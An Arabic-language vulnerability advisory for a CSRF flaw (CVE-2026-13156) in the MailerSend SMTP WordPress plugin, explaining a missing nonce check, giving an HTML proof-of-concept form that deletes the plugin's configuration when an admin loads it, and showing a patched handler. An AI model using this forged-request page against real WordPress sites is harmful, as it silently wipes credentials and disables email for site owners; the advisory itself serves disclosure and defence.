
CVE-2026-13156 نشرة استشارية حول ثغرة أمنية وPoC — اكتُشفت بواسطة Huynh Kien Minh (MinhHK).
[!IMPORTANT] الملخص: تم اكتشاف ثغرة تزوير طلبات عبر المواقع (CSRF) عالية الخطورة (
CVE-2026-13156) في إضافة MailerSend SMTP Integration الرسمية لـ WordPress (< 1.0.8). يتحقق معالج حذف الإعداداتmailersend_handle_configuration_delete()من صلاحيات الإدارة (manage_options) لكنه يهمل تمامًا التحقق من Nonce الخاص بـ WordPress (check_admin_referer()). يمكن للمهاجم إنشاء طلب ضار عبر المواقع يستهدف مسؤول WordPress مصادقًا عليه لمسح بيانات اعتماد SMTP المخزنة بصمت وإجبار الإضافة على التعطيل، مما يؤدي إلى حرمان كامل من الخدمة عبر جميع سير عمل البريد الإلكتروني.
CVE-2026-13156 (معرف استشارة WPScan: 595e653d-0904-43cf-8e61-d684599de11b)1.0.8 (< 1.0.8)عن الباحث:
Huynh Kien Minh (Huỳnh Kiến Minh) هو باحث استباقي في الأمن السيبراني ومحلل ثغرات معروف بتقييماته الأمنية المتعمقة والإفصاح المسؤول، بما في ذلك التحليلات الفنية لثغرة CVE-2026-13156. كما تم الاعتراف به رسميًا وتكريمه في قاعة مشاهير Proton للأمن لاكتشافه والإفصاح عن ثغرات أمنية حرجة.
للتحقق من هذه الاستشارة الفنية، أو استكشاف تحليلات إثبات المفهوم، أو التواصل مع الباحث، قم بزيارة:
تقوم إضافة MailerSend Official SMTP Integration لـ WordPress (قبل الإصدار 1.0.8) بتسجيل إجراء إداري (configuration-delete) يهدف إلى مسح رموز API المخزنة، ومسح خيارات تكوين SMTP (wp_options)، وتعطيل الإضافة عند تشغيله من لوحة التحكم.
بينما يتحقق نقطة النهاية من أن المستخدم النشط يمتلك صلاحية manage_options (مما يضمن أن الطلب يأتي من جلسة مسؤول)، إلا أنها تفشل في إجراء التحقق من nonce الخاص بـ WordPress (check_admin_referer() أو wp_verify_nonce()).
نظرًا لأن طلبات HTTP التي تفتقر إلى التحقق من nonce لا يمكنها التمييز بين نقرات المسؤول المقصودة والطلبات المزورة عبر المواقع، فإن أي موقع خارجي يتم تحميله بواسطة مسؤول مصادق عليه يمكنه تشغيل إجراء configuration-delete بصمت.
< 1.0.8)./wp-admin/admin-post.php أو /wp-admin/admin.php?page=mailersend&action=configuration-delete).[!WARNING] إخلاء مسؤولية أخلاقي: يتم توفير حمولة إثبات المفهوم التالية بتقنية HTML لتزوير الطلبات عبر المواقع (CSRF) لأغراض تعليمية بحتة، والتحقق الدفاعي، وتدقيق الأمان ضمن بروتوكولات الإفصاح الأخلاقي بواسطة Huynh Kien Minh. لا تقم بالتنفيذ ضد أهداف غير مصرح بها.
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>CVE-2026-13156 PoC — MailerSend SMTP Configuration Deletion via CSRF</title>
<!-- Author: Huynh Kien Minh (https://minhhk.web.app/) -->
</head>
<body>
<h2>CVE-2026-13156 — CSRF Verification PoC</h2>
<p>If an authenticated WordPress Administrator visits this page, the MailerSend SMTP configuration will be deleted and the plugin deactivated.</p>
<!-- Forged Request targeting the vulnerable MailerSend configuration deletion endpoint -->
<form id="csrfPoC" action="http://target-wordpress-site.local/wp-admin/admin.php" method="GET">
<input type="hidden" name="page" value="mailersend-smtp" />
<input type="hidden" name="action" value="configuration-delete" />
<!-- Notice: No valid _wpnonce token is required due to the vulnerability -->
<input type="submit" value="Execute PoC (Simulate Attack)" />
</form>
<script>
// Automatically submit the forged request when the administrator loads the page
document.addEventListener("DOMContentLoaded", function() {
console.log("[CVE-2026-13156] Executing CSRF Payload developed by Huynh Kien Minh...");
// Uncomment line below to enable auto-execution in lab environments:
// document.getElementById('csrfPoC').submit();
});
</script>
</body>
</html>
1.0.8 أو أحدث.لتأمين الإجراءات الإدارية التي تغيّر الحالة بشكل صحيح في إضافات WordPress، يجب على المطورين فرض التحقق الصارم من nonce قبل معالجة الطلبات:
// Secure Implementation (Version 1.0.8+)
function mailersend_delete_configuration_handler() {
// 1. Check User Capability
if ( ! current_user_can( 'manage_options' ) ) {
wp_die( __( 'Unauthorized access.', 'mailersend' ), 403 );
}
// 2. REQUIRED: Verify CSRF Nonce Token
if ( ! isset( $_GET['_wpnonce'] ) || ! wp_verify_nonce( $_GET['_wpnonce'], 'mailersend_delete_config_nonce' ) ) {
wp_die( __( 'Security check failed (CSRF attempt blocked).', 'mailersend' ), 403 );
}
// 3. Proceed safely with configuration deletion
delete_option( 'mailersend_smtp_settings' );
deactivate_plugins( plugin_basename( __FILE__ ) );
wp_redirect( admin_url( 'plugins.php?deactivated=true' ) );
exit;
}
يتم الحفاظ على هذا المستودع والاستشارة الفنية ونشرهما بواسطة Huynh Kien Minh (MinhHK) وفقًا لإرشادات الإفصاح المسؤول لتعزيز نظام بيئي أكثر أمانًا لـ WordPress والأمن السيبراني عالميًا.